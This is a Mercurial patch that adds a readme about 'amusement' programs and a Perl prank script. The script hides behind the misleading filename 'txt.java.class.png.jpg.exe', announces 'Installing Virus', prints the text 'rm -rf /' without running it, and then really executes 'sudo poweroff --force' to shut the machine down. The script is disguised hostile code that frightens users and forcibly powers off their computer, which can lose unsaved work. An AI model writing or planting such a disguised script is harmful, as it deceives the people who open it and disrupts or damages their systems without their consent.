# HG changeset patch # User Robert McIntyre # Date 1318922078 25200 # Node ID fd13a79adf946eda6d1767c57b9ae9850c93eca2 added a program that chris calabrese and I worked on one bored day in front of winston's office diff -r 000000000000 -r fd13a79adf94 readme.txt --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/readme.txt Tue Oct 18 00:14:38 2011 -0700 @@ -0,0 +1,3 @@ +these are programs that serve no purpose but amusement +they are "on crack" in that they do insane things. +enjoy. diff -r 000000000000 -r fd13a79adf94 txt.java.class.png.jpg.exe --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/txt.java.class.png.jpg.exe Tue Oct 18 00:14:38 2011 -0700 @@ -0,0 +1,25 @@ +#!/usr/bin/perl + +$| = 1; +print "Installing Virus"; + +dot(); +dot(); +dot(); +print "\n"; + +print "rm -rf /\n"; +sleep 4; +`sudo poweroff --force`; + + + + +sub dot { + sleep(1); + print "."; +} + + + +"molgasoft"